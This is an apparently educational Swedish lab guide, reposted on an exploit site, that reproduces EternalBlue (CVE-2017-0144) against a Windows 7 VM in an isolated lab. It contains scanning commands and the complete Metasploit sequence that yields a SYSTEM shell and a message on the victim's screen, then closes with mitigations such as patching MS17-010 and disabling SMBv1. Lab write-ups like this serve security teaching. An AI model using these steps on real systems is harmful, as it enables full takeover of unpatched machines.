Exploit for CVE-2017-0144

Name: Exploit for CVE-2017-0144
Rating: 5 (88 reviews)
2026-04-06 | CVSS 9.3
## https://sploitus.com/exploit?id=FF857FCA-900F-5970-B55B-81DE5BDEEC27
# Lab Guide: Exploatering av CVE-2017-0144 (EternalBlue)

Denna guide demonstrerar sårbarheten **CVE-2017-0144**, mer känd som **EternalBlue**. Denna exploit utnyttjar en brist i Microsofts implementering av SMBv1-protokollet och blev världsberömd genom ransomware-attacken **WannaCry**.

> [!WARNING]
> **Ansvarsfriskrivning:** Denna guide är endast för utbildningsändamål i en kontrollerad miljö. Utför aldrig penetrationstester eller exploits på system du inte har uttryckligt skriftligt tillstånd att testa.

---

## 🏗 Labmiljö & Material

För att återskapa sårbarheten på ett säkert sätt används en isolerad miljö i VirtualBox. Detta säkerställer att ingen trafik eller skadlig kod lämnar labbmiljön.

| Komponent | Detaljer | Källa |
| :--- | :--- | :--- |
| **Target** | Windows 7 Ultimate SP1 (x64) | [Archive.org](https://archive.org/details/win-7-ult-sp-1-english-x-64) |
| **Attacker** | Kali Linux (2025.3) | [Kali.org](https://www.kali.org/get-kali/#kali-virtual-machines) |
| **Hypervisor** | Oracle VirtualBox | [VirtualBox.org](https://www.virtualbox.org/wiki/Downloads) |

### Nätverkskonfiguration
Båda maskinerna ställs in på **Host-Only Adapter** för att isolera dem från internet men tillåta kommunikation mellan varandra.
* `Högerklicka på VM -> Settings -> Network -> Adapter 1 -> Attached to: Host-only Adapter`.




---

## 1. Förberedelser

### Konfigurera Windows 7 (Target)
Efter installationen måste Windows-brandväggen inaktiveras för att simulera en sårbar miljö utan externa skyddslager.
1. Gå till `Control Panel` -> `System and Security` -> `Windows Firewall`.
2. Välj `Turn Windows Firewall on or off` och ställ in på **Off**.


  
  
  


### Konfigurera Kali Linux (Attacker)
Logga in med standarduppgifterna `kali` / `kali`. Det är viktigt att tid och tidszon stämmer för korrekt loggning.
1. Öppna **Time and Date Settings**.
2. Lås upp inställningarna och ställ in rätt tidszon (t.ex. Europe/Stockholm).







---

## 2. Informationsinsamling & Scanning

### Identifiera Attacker IP
Kontrollera din egen IP-adress i Kali-terminalen:
`ip a`




### Nätverksupptäckt (Reconnaissance)
Vi använder netdiscover för att identifiera målets IP-adress på nätverket:
`sudo netdiscover`





### Scanning med Nmap
Nu har vi tre olika IP adresser och behöver köra en scanning för att bekräfta operativsystem och öppna portar (speciellt port 445 för SMB):

`sudo nmap -O 192.168.56.1 192.168.56.100 192.168.56.101`





Detta talar för oss att `192.168.56.1` och `192.168.56.100` är ointressanta.





Dock vi lyckades identifiera `192.168.56.101` som vår target med detaljerad information om öppna portar och operativsystem.






---

## 3. Exploatering med Metasploit
Nu använder vi Metasploit Framework för att utnyttja sårbarheten.

Starta Metasploit: `msfconsole`





Välj modul: `use exploit/windows/smb/ms17_010_eternalblue`





Sätt mål-IP: `set RHOSTS 192.168.56.101`





Sätt lyssnar-interface: `set LHOST eth0`





Kör exploiten: `run`





När vi ser meterpreter > har vi lyckats få en session.

---

## 4. Post-Exploatering
Vi kan nu kontrollera våra rättigheter:

`shell`

`whoami`





Resultatet `nt authority\system` bekräftar att vi har fullständig kontroll över systemet.


### Demonstrationsmeddelande
För att visa intrånget visuellt kan vi skicka ett meddelande direkt till offrets skärm:

`msg * "Du har blivit Hackad!"`





---

---

## 🛡️ Hur man skyddar sig

Att förstå hur man åtgärdar sårbarheter är en av de viktigaste färdigheterna för en säkerhetsexpert. För att effektivt skydda ett nätverk mot **EternalBlue** och liknande exploateringar bör följande åtgärder prioriteras:

> [!IMPORTANT]
> **Patch Management:** Den absolut viktigaste åtgärden är att installera säkerhetsuppdateringen **MS17-010**. Detta täpper till själva hålet som EternalBlue utnyttjar.

### Rekommenderade säkerhetsåtgärder:

* **Inaktivera SMBv1:** En gammal och osäker protokoll. Den bör inaktiveras helt via *Windows Features* eller Group Policy till förmån för SMBv2 eller SMBv3.
* **Härda Windows Brandväggen:** Säkerställ att port **445** (SMB) är blockerad för inkommande trafik från externa eller osäkra nätverk.
* **Modernisera Infrastrukturen:** Om möjligt uppgradera till moderna operativsystem som Windows 10/11. Dessa har inbyggda skydd (t.ex. *Control Flow Guard*) som gör minneskorruption mycket svårare att utnyttja.
* **Nätverkssegmentering:** Isolera kritiska system så att en eventuell infektion inte kan sprider sig i nätverket.

---

### 🔗 Kontakt & Nätverk
**Tack för att du tog dig tid att läsa min guide!** Om du har frågor, vill diskutera it-säkerhet eller ser möjligheter för samarbete, tveka inte att höra av dig.

[**Besök min profil på LinkedIn**](https://www.linkedin.com/in/althany)

---